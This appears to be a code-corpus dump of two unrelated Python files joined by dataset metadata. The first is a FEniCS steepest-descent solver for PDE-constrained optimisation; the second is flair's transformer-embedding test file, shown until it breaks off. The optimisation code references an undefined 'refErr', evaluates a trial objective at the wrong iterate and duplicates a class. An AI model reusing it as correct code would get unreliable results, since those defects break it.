#self.J_form = 0.5*((self.u - ud)**2 + self.alpha*self.m**2)*dx
def solve_state(self):
a,L = lhs(self.F), rhs(self.F)
solve(a == L, self.u, self.bc)
def solve_adjoint(self):
a,L = lhs(self.F_adj), rhs(self.F_adj)
solve(a == L, self.lmbd, self.bc)
def compute_RieszRep(self):
self.solve_state()
self.solve_adjoint()
a,L = lhs(self.F_R), rhs(self.F_R)
solve(a == L, self.RdJ)
def step_SD(self, step):
self.m.assign(self.m - step*self.RdJ)
def J(self, m):
return 0.5*((self.u - self.ud)**2 + self.alpha*m**2)*dx
def eval_J(self, m):
self.solve_state()
return assemble(self.J(m))
def solveSD(self, step = 500., iterTol = 1.0e-5, maxIter = 25,
dispOutput = False, writeData = False, filePath = 'solution-data/PDEOptSD'):
"""
Solves the PDE-constrained opt. problem using steepest descent (SD)
Inputs:
step: initial SD step-size (will be reduced to satisfy Armijo condition)
iterTol: Iterations stop when J < iterTol. Default: 1e-5
maxIter: Maximum number of iterations
dispOutput (bool): display iteration differences and objective values at each iteration
writeData (bool): write solution and convergence data to files
filePath: Path AND name of files WITHOUT file extension
Outputs:
[u: optimal state function
m: optimal control function
lmbd: Lagrange multiplier]
[mDiff: differences between iterative solutions (in H1 norm) at each iteration
Jk: objective value at each iteration
RdJk: H1 norm of Riesz rep. of dJ at each iteration (SD direction)
NOT IMPLEMENTED: refErr: H1 norms ||m_k-m_ref||.
Will be an empty array if calculateRef method has not been run]
Saved data:
u saved to <filePath>_u.pvd
m saved to <filePath>_m.pvd
lmbd saved to <filePath>_lmbd.pvd
Convergence data saved to <filePath>.csv:
column 0: iterate differences
"""
# perform one step outside of loop to ensure intial values satisfy constraints
Jk = [self.eval_J(self.m)]
mDiff = []
RdJk = []
iter = 0
while Jk[-1] > iterTol and iter < maxIter:
iter += 1
self.compute_RieszRep()
# trial step
self.mt.assign(self.m - step*self.RdJ)
# Frechet derivative of J at point m (previous iterate) in direction GJ, used for b-Armijo
armijo = assemble(-(self.alpha*self.m - self.lmbd)*self.RdJ*dx)
Jt = self.eval_J(self.m)
# require sufficent decrease (Armijo condition)
while Jt > (Jk[-1] + 0.1*step*armijo) and step > 1e-20 and iter > 1:
step = 0.75*step
# trial step with smaller step-size
self.mt.assign(self.m - step*self.RdJ)
Jt = self.eval_J(self.mt)
print 'Step-size set to: ' + str(step)
print 'J_trial = ' + str(Jt)
if step > 1e-20:
# step successful, update control
mDiff.append(errornorm(self.mt, self.m, 'H1'))
RdJk.append(norm(self.RdJ, 'H1'))
self.step_SD(step)
Jk.append(Jt)
else:
print 'Step-size reduced below threshold, convergence failed (?)'
if dispOutput:
print ('k = ' + str(iter) + ' | J = ' + str(Jk[-1]) + ' | norm(m) = '
+ str(norm(self.m, 'H1')) + ' | norm(R(dJ)) = ' + str(norm(self.RdJ, 'H1')))
# remove initial value
Jk.pop(0)
if writeData:
# save solution
solution = File(filePath + '_u.pvd')
solution << self.u
solution = File(filePath + '_m.pvd')
solution << self.m
solution = File(filePath + '_lmbd.pvd')
solution <<self. lmbd
# save convergence data
convergenceData = [mDiff, Jk, RdJk, refErr]
np.savetxt(filePath + '.csv', convergenceData)
return [self.u, self.m, self.lmbd], [mDiff, Jk, RdJk] #, refErr]
class nonlinPDECOP:
def __init__(self, N, p, ue = Expression('sin(pi*x[0])*sin(pi*x[1])', degree=3), alpha = 1e-07):
"""
Sets up the 'hello world' PDE-constrained optimisation problem
Inputs:
N: number of finite elements in mesh
p: order of function space
ue: Desired distribution (UFL expression)
alpha: regularisation parameter
"""
mesh = UnitSquareMesh(N,N)
V = FunctionSpace(mesh, "CG", p)
self.ud = interpolate(ue , V)
self.lmbd = interpolate(Constant(1.0), V)
self.m = interpolate(Constant(1.0), V)
self.mt = Function(V)
self.RdJ = Function(V)
self.u = Function(V)
self.u_k = Function(V)
self.du = Function(V)
self.alpha = alpha
# set up BCs on left and right
# lambda functions ensure the boundary methods take two variables
self.B1 = DirichletBC(V, Constant(0.0), lambda x, on_boundary : self.left_boundary(x, on_boundary)) # u(0) = 0
self.B2 = DirichletBC(V, Constant(1.0), lambda x, on_boundary : self.right_boundary(x, on_boundary)) # u(1) = 1
self.B2du = DirichletBC(V, Constant(0.0), lambda x, on_boundary : self.right_boundary(x, on_boundary))
self.bcdu = [self.B1, self.B2du] # bcs for du variational problem
self.bc = DirichletBC(V,0.,"on_boundary") # bcs for adjoint problem
v = TestFunction(V)
#form of state equation
# construct initial guess (solution to state eqn with q(u) = 1)
u_k_ = TrialFunction(V)
a0du = inner(grad(u_k_), grad(v))*dx
f = Constant(0.0)
L0du = f*v*dx
solve(a0du == L0du, self.u_k, [self.B1, self.B2])
# construct state eqn in du
du_ = TrialFunction(V) # newton step
self.adu = (inner(self.q(self.u_k)*grad(du_),grad(v)) + inner(self.dqdu(self.u_k)*du_*grad(self.u_k),grad(v)))*dx
self.Ldu = -inner(self.q(self.u_k)*grad(self.u_k),grad(v))*dx + self.m*v*dx
#form of adjoint
lmbd_ = TrialFunction(V)
self.F_adj = inner(grad(lmbd_), grad(v))*dx + (self.u - self.ud)*v*dx
# form of dJ = (RdJ, v)
RdJ_ = TrialFunction(V)
self.F_R = RdJ_*v*dx - (self.alpha*self.m - self.lmbd)*v*dx
#form of objective functional
#self.J_form = 0.5*((self.u - ud)**2 + self.alpha*self.m**2)*dx
def left_boundary(self, x, on_boundary):
return on_boundary and abs(x[0]) < 1E-14
def right_boundary(self, x, on_boundary):
return on_boundary and abs(x[0]-1) < 1E-14
def q(self, u):
return (1+u)**2
def dqdu(self, u):
return 2*(1+u)
def solve_state(self, iterTol = 1.0e-6, maxIter = 25, dispOutput = False):
"""
Solves the state equation using Newton iterations. Initial guess for
first solve is calculated in __init__, value of u from last m-step
is used thereafter.
Inputs:
iterTol: Iterations stop when |u_(k) - u_(k-1)| < iterTol. Default: 1e-5
maxIter: Maximum number of iterations
dispOutput(True/False): display iteration differences and exact errors at each iteration
writeData(True/False): write solution and convergence data to files
filePath: Path AND name of files WITHOUT file extension
Outputs:
u: solution to PDE
iterDiffArray: Differences between iterative solutions (in H1 norm) at each iteration
exactErrArray: Exact errors (in H1 norm) at each iteration
Saved data:
FEniCS solution saved to <filePath>.pvd
Convergence data saved to <filePath>.csv:
column 0: iterate differences
column 1: exact errors
"""
itErr = 1.0
iterDiffArray = []
iter = 0
while itErr > iterTol and iter < maxIter:
iter += 1
solve(self.adu == self.Ldu, self.du, self.bcdu)
self.u_k.assign(self.u + self.du)
# calculate iterate difference and exact error in L2 norm
itErr = errornorm(self.u_k, self.u, 'H1')
#exErr = errornorm(self.uExpr, u, 'H1')
iterDiffArray.append(itErr) # fill arrays with error data
if dispOutput:
print('k = ' + str(iter) + ' | u-diff = ' + str(itErr))
self.u.assign(self.u_k)
def solve_adjoint(self):
a,L = lhs(self.F_adj), rhs(self.F_adj)
solve(a == L, self.lmbd, self.bc)
def compute_RieszRep(self):
self.solve_state(dispOutput=True)
self.solve_adjoint()
a,L = lhs(self.F_R), rhs(self.F_R)
solve(a == L, self.RdJ)
def step_SD(self, step):
self.m.assign(self.m - step*self.RdJ)
def J(self, m):
return 0.5*((self.u - self.ud)**2 + self.alpha*m**2)*dx
def eval_J(self, m):
self.solve_state(dispOutput=True)
return assemble(self.J(m))
def solveSD(self, step = 500., iterTol = 1.0e-5, maxIter = 25,
dispOutput = False, writeData = False, filePath = 'solution-data/PDEOptSD'):
"""
Solves the PDE-constrained opt. problem using steepest descent (SD)
Inputs:
step: initial SD step-size (will be reduced to satisfy Armijo condition)
iterTol: Iterations stop when J < iterTol. Default: 1e-5
maxIter: Maximum number of iterations
dispOutput (bool): display iteration differences and objective values at each iteration
writeData (bool): write solution and convergence data to files
filePath: Path AND name of files WITHOUT file extension
Outputs:
[u: optimal state function
m: optimal control function
lmbd: Lagrange multiplier]
[mDiff: differences between iterative solutions (in H1 norm) at each iteration
Jk: objective value at each iteration
RdJk: H1 norm of Riesz rep. of dJ at each iteration (SD direction)
NOT IMPLEMENTED: refErr: H1 norms ||m_k-m_ref||.
Will be an empty array if calculateRef method has not been run]
Saved data:
u saved to <filePath>_u.pvd
m saved to <filePath>_m.pvd
lmbd saved to <filePath>_lmbd.pvd
Convergence data saved to <filePath>.csv:
column 0: iterate differences
"""
# perform one step outside of loop to ensure intial values satisfy constraints
Jk = [self.eval_J(self.m)]
mDiff = []
RdJk = []
iter = 0
while Jk[-1] > iterTol and iter < maxIter:
iter += 1
self.compute_RieszRep()
# trial step
self.mt.assign(self.m - step*self.RdJ)
# Frechet derivative of J at point m (previous iterate) in direction GJ, used for b-Armijo
armijo = assemble(-(self.alpha*self.m - self.lmbd)*self.RdJ*dx)
Jt = self.eval_J(self.m)
# require sufficent decrease (Armijo condition)
while Jt > (Jk[-1] + 0.1*step*armijo) and step > 1e-20 and iter > 1:
step = 0.75*step
# trial step with smaller step-size
self.mt.assign(self.m - step*self.RdJ)
Jt = self.eval_J(self.mt)
print 'Step-size set to: ' + str(step)
print 'J_trial = ' + str(Jt)
if step > 1e-20:
# step successful, update control
mDiff.append(errornorm(self.mt, self.m, 'H1'))
RdJk.append(norm(self.RdJ, 'H1'))
self.step_SD(step)
Jk.append(Jt)
else:
print 'Step-size reduced below threshold, convergence failed (?)'
if dispOutput:
print ('k = ' + str(iter) + ' | J = ' + str(Jk[-1]) + ' | norm(m) = '
+ str(norm(self.m, 'H1')) + ' | norm(R(dJ)) = ' + str(norm(self.RdJ, 'H1')))
# remove initial value
Jk.pop(0)
if writeData:
# save solution
solution = File(filePath + '_u.pvd')
solution << self.u
solution = File(filePath + '_m.pvd')
solution << self.m
solution = File(filePath + '_lmbd.pvd')
solution <<self. lmbd
# save convergence data
convergenceData = [mDiff, Jk, RdJk, refErr]
np.savetxt(filePath + '.csv', convergenceData)
return [self.u, self.m, self.lmbd], [mDiff, Jk, RdJk]
"""from fenics_adjoint import *
import moola
class nonlinearPDECOP:
def __init__(self, N, p, ue = Expression('sin(pi*x[0])*sin(pi*x[1])', degree=3), alpha = 1e-07):
mesh = UnitSquareMesh(N,N)
V = FunctionSpace(mesh, 'CG', p)
W = FunctionSpace(mesh, 'CG', p)
# initial guess for control
self.m = interpolate(Expression('pi*x[0]*pi*x[1]', degree=1), W)
self.u = Function(V, name='State')
v = TestFunction(V)
# solve state equation
self.F = (inner(grad(self.u), grad(v)) - self.m*v)*dx
self.bc = DirichletBC(V, 0., 'on_boundary')
# dolfin_adjoint automatically saves iterates for use in control problem
solve(self.F == 0, self.u, self.bc)
self.ud = interpolate(ue, V)
self.alpha = alpha
J = assemble((0.5*inner(self.u-self.ud, self.u-self.ud))*dx + alpha/2*self.m**2*dx)
control = Control(m)
rf = ReducedFunctional(J, control)
"""
| 40.744737
| 126
| 0.555319
| 2,036
| 15,483
| 4.162083
| 0.13998
| 0.021831
| 0.007789
| 0.006372
| 0.797262
| 0.786523
| 0.773307
| 0.751003
| 0.747345
| 0.742506
| 0
| 0.017463
| 0.330556
| 15,483
| 380
| 127
| 40.744737
| 0.800096
| 0.090228
| 0
| 0.77957
| 0
| 0
| 0.05117
| 0.010525
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.016129
| null | null | 0.048387
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
73264e0b65514adaff39752188d292ca0389f389
| 31,418
|
py
|
Python
|
tests/test_transformer_embeddings.py
|
OguzKircicek/flair
|
fa3be40ea1d37b38b8f613b83eb3f8984d71c3e9
|
[
"MIT"
] | 1
|
2021-05-19T11:42:58.000Z
|
2021-05-19T11:42:58.000Z
|
tests/test_transformer_embeddings.py
|
OguzKircicek/flair
|
fa3be40ea1d37b38b8f613b83eb3f8984d71c3e9
|
[
"MIT"
] | null | null | null |
tests/test_transformer_embeddings.py
|
OguzKircicek/flair
|
fa3be40ea1d37b38b8f613b83eb3f8984d71c3e9
|
[
"MIT"
] | null | null | null |
import flair
import torch
import pytest
from flair.data import Sentence
from flair.embeddings import (
RoBERTaEmbeddings,
OpenAIGPTEmbeddings,
OpenAIGPT2Embeddings,
XLNetEmbeddings,
TransformerXLEmbeddings,
XLMEmbeddings,
)
from transformers import (
RobertaModel,
RobertaTokenizer,
OpenAIGPTModel,
OpenAIGPTTokenizer,
GPT2Model,
GPT2Tokenizer,
XLNetModel,
XLNetTokenizer,
TransfoXLModel,
TransfoXLTokenizer,
XLMModel,
XLMTokenizer,
)
from typing import List
def calculate_mean_embedding(
subword_embeddings: List[torch.FloatTensor],
) -> torch.FloatTensor:
all_embeddings: List[torch.FloatTensor] = [
embedding.unsqueeze(0) for embedding in subword_embeddings
]
return torch.mean(torch.cat(all_embeddings, dim=0), dim=0)
@pytest.mark.slow
def test_roberta_embeddings():
roberta_model: str = "roberta-base"
tokenizer = RobertaTokenizer.from_pretrained(roberta_model)
model = RobertaModel.from_pretrained(
pretrained_model_name_or_path=roberta_model, output_hidden_states=True
)
model.to(flair.device)
model.eval()
s: str = "Berlin and Munich have a lot of puppeteer to see ."
with torch.no_grad():
tokens = tokenizer.tokenize("<s> " + s + " </s>")
indexed_tokens = tokenizer.convert_tokens_to_ids(tokens)
tokens_tensor = torch.tensor([indexed_tokens])
tokens_tensor = tokens_tensor.to(flair.device)
hidden_states = model(tokens_tensor)[-1]
first_layer = hidden_states[1][0]
assert len(first_layer) == len(tokens)
# 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
#
# '<s>', 'Ber', 'lin', 'Ġand', 'ĠMunich', 'Ġhave', 'Ġa', 'Ġlot', 'Ġof', 'Ġpupp', 'ete', 'er', 'Ġto', 'Ġsee', 'Ġ.', '</s>'
# \ / | | | | | | \ | / | | |
# Berlin and Munich have a lot of puppeteer to see .
#
# 0 1 2 3 4 5 6 7 8 9 10
def embed_sentence(
sentence: str,
pooling_operation,
layers: str = "1",
use_scalar_mix: bool = False,
) -> Sentence:
embeddings = RoBERTaEmbeddings(
pretrained_model_name_or_path=roberta_model,
layers=layers,
pooling_operation=pooling_operation,
use_scalar_mix=use_scalar_mix,
)
flair_sentence = Sentence(sentence)
embeddings.embed(flair_sentence)
return flair_sentence
# First subword embedding
sentence_first_subword = embed_sentence(sentence=s, pooling_operation="first")
first_token_embedding_ref = first_layer[1].tolist()
first_token_embedding_actual = sentence_first_subword.tokens[0].embedding.tolist()
puppeteer_first_subword_embedding_ref = first_layer[9].tolist()
puppeteer_first_subword_embedding_actual = sentence_first_subword.tokens[
7
].embedding.tolist()
assert first_token_embedding_ref == first_token_embedding_actual
assert (
puppeteer_first_subword_embedding_ref
== puppeteer_first_subword_embedding_actual
)
# Last subword embedding
sentence_last_subword = embed_sentence(sentence=s, pooling_operation="last")
# First token is splitted into two subwords.
# As we use "last" as pooling operation, we consider the last subword as "first token" here
first_token_embedding_ref = first_layer[2].tolist()
first_token_embedding_actual = sentence_last_subword.tokens[0].embedding.tolist()
puppeteer_last_subword_embedding_ref = first_layer[11].tolist()
puppeteer_last_subword_embedding_actual = sentence_last_subword.tokens[
7
].embedding.tolist()
assert first_token_embedding_ref == first_token_embedding_actual
assert (
puppeteer_last_subword_embedding_ref == puppeteer_last_subword_embedding_actual
)
# First and last subword embedding
sentence_first_last_subword = embed_sentence(
sentence=s, pooling_operation="first_last"
)
first_token_embedding_ref = torch.cat([first_layer[1], first_layer[2]]).tolist()
first_token_embedding_actual = sentence_first_last_subword.tokens[
0
].embedding.tolist()
puppeteer_first_last_subword_embedding_ref = torch.cat(
[first_layer[9], first_layer[11]]
).tolist()
puppeteer_first_last_subword_embedding_actual = sentence_first_last_subword.tokens[
7
].embedding.tolist()
assert first_token_embedding_ref == first_token_embedding_actual
assert (
puppeteer_first_last_subword_embedding_ref
== puppeteer_first_last_subword_embedding_actual
)
# Mean of all subword embeddings
sentence_mean_subword = embed_sentence(sentence=s, pooling_operation="mean")
first_token_embedding_ref = calculate_mean_embedding(
[first_layer[1], first_layer[2]]
).tolist()
first_token_embedding_actual = sentence_mean_subword.tokens[0].embedding.tolist()
puppeteer_mean_subword_embedding_ref = calculate_mean_embedding(
[first_layer[9], first_layer[10], first_layer[11]]
).tolist()
puppeteer_mean_subword_embedding_actual = sentence_mean_subword.tokens[
7
].embedding.tolist()
assert first_token_embedding_ref == first_token_embedding_actual
assert (
puppeteer_mean_subword_embedding_ref == puppeteer_mean_subword_embedding_actual
)
# Check embedding dimension when using multiple layers
sentence_mult_layers = embed_sentence(
sentence="Munich", pooling_operation="first", layers="1,2,3,4"
)
ref_embedding_size = 4 * 768
actual_embedding_size = len(sentence_mult_layers.tokens[0].embedding)
assert ref_embedding_size == actual_embedding_size
# Check embedding dimension when using multiple layers and scalar mix
sentence_mult_layers_scalar_mix = embed_sentence(
sentence="Berlin",
pooling_operation="first",
layers="1,2,3,4",
use_scalar_mix=True,
)
ref_embedding_size = 1 * 768
actual_embedding_size = len(sentence_mult_layers_scalar_mix.tokens[0].embedding)
assert ref_embedding_size == actual_embedding_size
@pytest.mark.slow
def test_gpt_embeddings():
gpt_model: str = "openai-gpt"
tokenizer = OpenAIGPTTokenizer.from_pretrained(gpt_model)
model = OpenAIGPTModel.from_pretrained(
pretrained_model_name_or_path=gpt_model, output_hidden_states=True
)
model.to(flair.device)
model.eval()
s: str = "Berlin and Munich have a lot of puppeteer to see ."
with torch.no_grad():
tokens = tokenizer.tokenize(s)
indexed_tokens = tokenizer.convert_tokens_to_ids(tokens)
tokens_tensor = torch.tensor([indexed_tokens])
tokens_tensor = tokens_tensor.to(flair.device)
hidden_states = model(tokens_tensor)[-1]
first_layer = hidden_states[1][0]
assert len(first_layer) == len(tokens)
# 0 1 2 3 4 5 6 7 8 9 10 11 12
#
# 'berlin</w>', 'and</w>', 'munich</w>', 'have</w>', 'a</w>', 'lot</w>', 'of</w>', 'pupp', 'ete', 'er</w>', 'to</w>', 'see</w>', '.</w>'
# | | | | | | | \ | / | | |
# Berlin and Munich have a lot of puppeteer to see .
#
# 0 1 2 3 4 5 6 7 8 9 10
def embed_sentence(
sentence: str,
pooling_operation,
layers: str = "1",
use_scalar_mix: bool = False,
) -> Sentence:
embeddings = OpenAIGPTEmbeddings(
pretrained_model_name_or_path=gpt_model,
layers=layers,
pooling_operation=pooling_operation,
use_scalar_mix=use_scalar_mix,
)
flair_sentence = Sentence(sentence)
embeddings.embed(flair_sentence)
return flair_sentence
# First subword embedding
sentence_first_subword = embed_sentence(sentence=s, pooling_operation="first")
first_token_embedding_ref = first_layer[0].tolist()
first_token_embedding_actual = sentence_first_subword.tokens[0].embedding.tolist()
puppeteer_first_subword_embedding_ref = first_layer[7].tolist()
puppeteer_first_subword_embedding_actual = sentence_first_subword.tokens[
7
].embedding.tolist()
assert first_token_embedding_ref == first_token_embedding_actual
assert (
puppeteer_first_subword_embedding_ref
== puppeteer_first_subword_embedding_actual
)
# Last subword embedding
sentence_last_subword = embed_sentence(sentence=s, pooling_operation="last")
first_token_embedding_ref = first_layer[0].tolist()
first_token_embedding_actual = sentence_last_subword.tokens[0].embedding.tolist()
puppeteer_last_subword_embedding_ref = first_layer[9].tolist()
puppeteer_last_subword_embedding_actual = sentence_last_subword.tokens[
7
].embedding.tolist()
assert first_token_embedding_ref == first_token_embedding_actual
assert (
puppeteer_last_subword_embedding_ref == puppeteer_last_subword_embedding_actual
)
# First and last subword embedding
sentence_first_last_subword = embed_sentence(
sentence=s, pooling_operation="first_last"
)
first_token_embedding_ref = torch.cat([first_layer[0], first_layer[0]]).tolist()
first_token_embedding_actual = sentence_first_last_subword.tokens[
0
].embedding.tolist()
puppeteer_first_last_subword_embedding_ref = torch.cat(
[first_layer[7], first_layer[9]]
).tolist()
puppeteer_first_last_subword_embedding_actual = sentence_first_last_subword.tokens[
7
].embedding.tolist()
assert first_token_embedding_ref == first_token_embedding_actual
assert (
puppeteer_first_last_subword_embedding_ref
== puppeteer_first_last_subword_embedding_actual
)
# Mean of all subword embeddings
sentence_mean_subword = embed_sentence(sentence=s, pooling_operation="mean")
first_token_embedding_ref = calculate_mean_embedding([first_layer[0]]).tolist()
first_token_embedding_actual = sentence_mean_subword.tokens[0].embedding.tolist()
puppeteer_mean_subword_embedding_ref = calculate_mean_embedding(
[first_layer[7], first_layer[8], first_layer[9]]
).tolist()
puppeteer_mean_subword_embedding_actual = sentence_mean_subword.tokens[
7
].embedding.tolist()
assert first_token_embedding_ref == first_token_embedding_actual
assert (
puppeteer_mean_subword_embedding_ref == puppeteer_mean_subword_embedding_actual
)
# Check embedding dimension when using multiple layers
sentence_mult_layers = embed_sentence(
sentence="Munich", pooling_operation="first", layers="1,2,3,4"
)
ref_embedding_size = 4 * 768
actual_embedding_size = len(sentence_mult_layers.tokens[0].embedding)
assert ref_embedding_size == actual_embedding_size
# Check embedding dimension when using multiple layers and scalar mix
sentence_mult_layers_scalar_mix = embed_sentence(
sentence="Berlin",
pooling_operation="first",
layers="1,2,3,4",
use_scalar_mix=True,
)
ref_embedding_size = 1 * 768
actual_embedding_size = len(sentence_mult_layers_scalar_mix.tokens[0].embedding)
assert ref_embedding_size == actual_embedding_size
@pytest.mark.slow
def test_gpt2_embeddings():
gpt_model: str = "gpt2-medium"
tokenizer = GPT2Tokenizer.from_pretrained(gpt_model)
model = GPT2Model.from_pretrained(
pretrained_model_name_or_path=gpt_model, output_hidden_states=True
)
model.to(flair.device)
model.eval()
s: str = "Berlin and Munich have a lot of puppeteer to see ."
with torch.no_grad():
tokens = tokenizer.tokenize("<|endoftext|>" + s + "<|endoftext|>")
indexed_tokens = tokenizer.convert_tokens_to_ids(tokens)
tokens_tensor = torch.tensor([indexed_tokens])
tokens_tensor = tokens_tensor.to(flair.device)
hidden_states = model(tokens_tensor)[-1]
first_layer = hidden_states[1][0]
assert len(first_layer) == len(tokens)
# 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
#
# '<|endoftext|>', 'Ber', 'lin', 'Ġand', 'ĠMunich', 'Ġhave', 'Ġa', 'Ġlot', 'Ġof', 'Ġpupp', 'ete', 'er', 'Ġto', 'Ġsee', 'Ġ.', '<|endoftext|>'
# \ / | | | | | | \ | / | | |
# Berlin and Munich have a lot of puppeteer to see .
#
# 0 1 2 3 4 5 6 7 8 9 10
def embed_sentence(
sentence: str,
pooling_operation,
layers: str = "1",
use_scalar_mix: bool = False,
) -> Sentence:
embeddings = OpenAIGPT2Embeddings(
pretrained_model_name_or_path=gpt_model,
layers=layers,
pooling_operation=pooling_operation,
use_scalar_mix=use_scalar_mix,
)
flair_sentence = Sentence(sentence)
embeddings.embed(flair_sentence)
return flair_sentence
# First subword embedding
sentence_first_subword = embed_sentence(sentence=s, pooling_operation="first")
first_token_embedding_ref = first_layer[1].tolist()
first_token_embedding_actual = sentence_first_subword.tokens[0].embedding.tolist()
puppeteer_first_subword_embedding_ref = first_layer[9].tolist()
puppeteer_first_subword_embedding_actual = sentence_first_subword.tokens[
7
].embedding.tolist()
assert first_token_embedding_ref == first_token_embedding_actual
assert (
puppeteer_first_subword_embedding_ref
== puppeteer_first_subword_embedding_actual
)
# Last subword embedding
sentence_last_subword = embed_sentence(sentence=s, pooling_operation="last")
# First token is splitted into two subwords.
# As we use "last" as pooling operation, we consider the last subword as "first token" here
first_token_embedding_ref = first_layer[2].tolist()
first_token_embedding_actual = sentence_last_subword.tokens[0].embedding.tolist()
puppeteer_last_subword_embedding_ref = first_layer[11].tolist()
puppeteer_last_subword_embedding_actual = sentence_last_subword.tokens[
7
].embedding.tolist()
assert first_token_embedding_ref == first_token_embedding_actual
assert (
puppeteer_last_subword_embedding_ref == puppeteer_last_subword_embedding_actual
)
# First and last subword embedding
sentence_first_last_subword = embed_sentence(
sentence=s, pooling_operation="first_last"
)
first_token_embedding_ref = torch.cat([first_layer[1], first_layer[2]]).tolist()
first_token_embedding_actual = sentence_first_last_subword.tokens[
0
].embedding.tolist()
puppeteer_first_last_subword_embedding_ref = torch.cat(
[first_layer[9], first_layer[11]]
).tolist()
puppeteer_first_last_subword_embedding_actual = sentence_first_last_subword.tokens[
7
].embedding.tolist()
assert first_token_embedding_ref == first_token_embedding_actual
assert (
puppeteer_first_last_subword_embedding_ref
== puppeteer_first_last_subword_embedding_actual
)
# Mean of all subword embeddings
sentence_mean_subword = embed_sentence(sentence=s, pooling_operation="mean")
first_token_embedding_ref = calculate_mean_embedding(
[first_layer[1], first_layer[2]]
).tolist()
first_token_embedding_actual = sentence_mean_subword.tokens[0].embedding.tolist()
puppeteer_mean_subword_embedding_ref = calculate_mean_embedding(
[first_layer[9], first_layer[10], first_layer[11]]
).tolist()
puppeteer_mean_subword_embedding_actual = sentence_mean_subword.tokens[
7
].embedding.tolist()
assert first_token_embedding_ref == first_token_embedding_actual
assert (
puppeteer_mean_subword_embedding_ref == puppeteer_mean_subword_embedding_actual
)
# Check embedding dimension when using multiple layers
sentence_mult_layers = embed_sentence(
sentence="Munich", pooling_operation="first", layers="1,2,3,4"
)
ref_embedding_size = 4 * 1024
actual_embedding_size = len(sentence_mult_layers.tokens[0].embedding)
assert ref_embedding_size == actual_embedding_size
# Check embedding dimension when using multiple layers and scalar mix
sentence_mult_layers_scalar_mix = embed_sentence(
sentence="Berlin",
pooling_operation="first",
layers="1,2,3,4",
use_scalar_mix=True,
)
ref_embedding_size = 1 * 1024
actual_embedding_size = len(sentence_mult_layers_scalar_mix.tokens[0].embedding)
assert ref_embedding_size == actual_embedding_size
@pytest.mark.slow
def test_xlnet_embeddings():
xlnet_model: str = "xlnet-large-cased"
tokenizer = XLNetTokenizer.from_pretrained(xlnet_model)
model = XLNetModel.from_pretrained(
pretrained_model_name_or_path=xlnet_model, output_hidden_states=True
)
model.to(flair.device)
model.eval()
s: str = "Berlin and Munich have a lot of puppeteer to see ."
with torch.no_grad():
tokens = tokenizer.tokenize("<s>" + s + "</s>")
print(tokens)
indexed_tokens = tokenizer.convert_tokens_to_ids(tokens)
tokens_tensor = torch.tensor([indexed_tokens])
tokens_tensor = tokens_tensor.to(flair.device)
hidden_states = model(tokens_tensor)[-1]
first_layer = hidden_states[1][0]
assert len(first_layer) == len(tokens)
# 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14
#
# '<s>', '▁Berlin', '▁and', '▁Munich', '▁have', '▁a', '▁lot', '▁of', '▁puppet', 'eer', '▁to', '▁see', '▁', '.', '</s>'
# | | | | | | | \ / | | \ /
# Berlin and Munich have a lot of puppeteer to see .
#
# 0 1 2 3 4 5 6 7 8 9 10
def embed_sentence(
sentence: str,
pooling_operation,
layers: str = "1",
use_scalar_mix: bool = False,
) -> Sentence:
embeddings = XLNetEmbeddings(
pretrained_model_name_or_path=xlnet_model,
layers=layers,
pooling_operation=pooling_operation,
use_scalar_mix=use_scalar_mix,
)
flair_sentence = Sentence(sentence)
embeddings.embed(flair_sentence)
return flair_sentence
# First subword embedding
sentence_first_subword = embed_sentence(sentence=s, pooling_operation="first")
first_token_embedding_ref = first_layer[1].tolist()
first_token_embedding_actual = sentence_first_subword.tokens[0].embedding.tolist()
puppeteer_first_subword_embedding_ref = first_layer[8].tolist()
puppeteer_first_subword_embedding_actual = sentence_first_subword.tokens[
7
].embedding.tolist()
assert first_token_embedding_ref == first_token_embedding_actual
assert (
puppeteer_first_subword_embedding_ref
== puppeteer_first_subword_embedding_actual
)
# Last subword embedding
sentence_last_subword = embed_sentence(sentence=s, pooling_operation="last")
first_token_embedding_ref = first_layer[1].tolist()
first_token_embedding_actual = sentence_last_subword.tokens[0].embedding.tolist()
puppeteer_last_subword_embedding_ref = first_layer[9].tolist()
puppeteer_last_subword_embedding_actual = sentence_last_subword.tokens[
7
].embedding.tolist()
assert first_token_embedding_ref == first_token_embedding_actual
assert (
puppeteer_last_subword_embedding_ref == puppeteer_last_subword_embedding_actual
)
# First and last subword embedding
sentence_first_last_subword = embed_sentence(
sentence=s, pooling_operation="first_last"
)
first_token_embedding_ref = torch.cat([first_layer[1], first_layer[1]]).tolist()
first_token_embedding_actual = sentence_first_last_subword.tokens[
0
].embedding.tolist()
puppeteer_first_last_subword_embedding_ref = torch.cat(
[first_layer[8], first_layer[9]]
).tolist()
puppeteer_first_last_subword_embedding_actual = sentence_first_last_subword.tokens[
7
].embedding.tolist()
assert first_token_embedding_ref == first_token_embedding_actual
assert (
puppeteer_first_last_subword_embedding_ref
== puppeteer_first_last_subword_embedding_actual
)
# Mean of all subword embeddings
sentence_mean_subword = embed_sentence(sentence=s, pooling_operation="mean")
first_token_embedding_ref = calculate_mean_embedding([first_layer[1]]).tolist()
first_token_embedding_actual = sentence_mean_subword.tokens[0].embedding.tolist()
puppeteer_mean_subword_embedding_ref = calculate_mean_embedding(
[first_layer[8], first_layer[9]]
).tolist()
puppeteer_mean_subword_embedding_actual = sentence_mean_subword.tokens[
7
].embedding.tolist()
assert first_token_embedding_ref == first_token_embedding_actual
assert (
puppeteer_mean_subword_embedding_ref == puppeteer_mean_subword_embedding_actual
)
# Check embedding dimension when using multiple layers
sentence_mult_layers = embed_sentence(
sentence="Munich", pooling_operation="first", layers="1,2,3,4"
)
ref_embedding_size = 4 * model.d_model
actual_embedding_size = len(sentence_mult_layers.tokens[0].embedding)
assert ref_embedding_size == actual_embedding_size
# Check embedding dimension when using multiple layers and scalar mix
sentence_mult_layers_scalar_mix = embed_sentence(
sentence="Berlin",
pooling_operation="first",
layers="1,2,3,4",
use_scalar_mix=True,
)
ref_embedding_size = 1 * model.d_model
actual_embedding_size = len(sentence_mult_layers_scalar_mix.tokens[0].embedding)
